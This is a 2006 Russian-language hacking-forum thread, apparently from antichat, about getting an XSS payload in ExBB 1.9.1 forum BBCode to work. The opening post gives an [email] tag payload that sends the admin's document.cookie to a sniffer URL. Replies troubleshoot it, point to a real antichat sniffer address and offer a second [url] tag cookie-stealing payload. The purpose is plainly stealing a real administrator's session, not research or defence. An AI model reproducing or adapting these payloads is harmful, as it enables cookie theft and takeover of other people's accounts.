Вопрос по применению XSS на форуме ExBB 1.9.1

Discussion in 'Песочница' started by TweakeR, 26 Feb 2006.

  1. TweakeR

    TweakeR Member

    Joined:
    6 Feb 2006
    Messages:
    54
    Likes Received:
    8
    Reputations:
    5
    Пробывал:

    Code:
    [ email]'style='display:none;background:url(javascript:doc  ument.images[2].src="http://you_sniffer_url/sniffer.php?"+document.cookie)[/email
    Админ прочитал а не чё не шлёт!
    Что можно придумать подскажите? :D
     
    #1 TweakeR, 26 Feb 2006
    Last edited by a moderator: 27 Feb 2006
  2. tclover

    tclover nobody

    Joined:
    13 Dec 2005
    Messages:
    741
    Likes Received:
    682
    Reputations:
    287
    Code:
    [url]http://you_sniffer_url/sniffer.php[/url]
    а чё так и оставил?
     
    #2 tclover, 26 Feb 2006
    Last edited by a moderator: 27 Feb 2006
  3. Vovec

    Vovec New Member

    Joined:
    31 Aug 2005
    Messages:
    27
    Likes Received:
    2
    Reputations:
    0
    А что тебе админ должен прислать=)
    Куки должны были тебе слиться, на сниффер который ты указал, если ты это сделал... Только убери пробел между doc и ument и в конце поставь ] ну и конешно путь к сниферу например античатовскому "http://antichat.ru/cgi-bin/s.jpg" Если будет работать то тебе должны будут первыми прийти твои куки если ты там зареген...
     
  4. A110ut

    A110ut Elder - Старейшина

    Joined:
    31 Dec 2005
    Messages:
    505
    Likes Received:
    263
    Reputations:
    92
    лол :) бывает и такое)
    короче вот еще один. используется также как и твой

    Code:
    [*url]http:/*/sasa'style=background:url("javascript:document.images[0].src='http://antichat.org/s/ТВАЙ_СНИФАК.gif?'+document.cookie");lol:'sa[*/url]
    зы: * * * убери
     
    #4 A110ut, 26 Feb 2006
    Last edited by a moderator: 27 Feb 2006
    1 person likes this.
  5. TweakeR

    TweakeR Member

    Joined:
    6 Feb 2006
    Messages:
    54
    Likes Received:
    8
    Reputations:
    5
    Trampled_clover нет конечно снифер подставил и все пробелы убрал!
     
    #5 TweakeR, 26 Feb 2006
    Last edited: 26 Feb 2006
  6. Inferno

    Inferno Elder - Старейшина

    Joined:
    30 Dec 2005
    Messages:
    97
    Likes Received:
    17
    Reputations:
    2
    А скобку не закрыл?
     
  7. Tem

    Tem -

    Joined:
    5 Oct 2005
    Messages:
    557
    Likes Received:
    157
    Reputations:
    179
    А может у него не ОСЛИК ? поэтому не шлёт .Если я не ошибаюсь этот XSS только для ИЕ браузера.
     
    #7 Tem, 26 Feb 2006
    Last edited: 26 Feb 2006
  8. podkashey

    podkashey С крышкой по жизни!

    Joined:
    18 Jun 2005
    Messages:
    757
    Likes Received:
    351
    Reputations:
    353
    ггыгыгы.... У меня 2 варианта ответа:
    1)
    согласен с этим (Ослик - интернет эксплорер).
    2) Админ умный и форум пропатчен.
     
  9. Electro

    Electro Elder - Старейшина

    Joined:
    23 Oct 2005
    Messages:
    243
    Likes Received:
    45
    Reputations:
    39
    Покажи как выглядит результат скрипта в HTML
     
  10. milord69

    milord69 New Member

    Joined:
    24 Nov 2005
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    В 7 ИЕ куки не тырятся
     
Loading...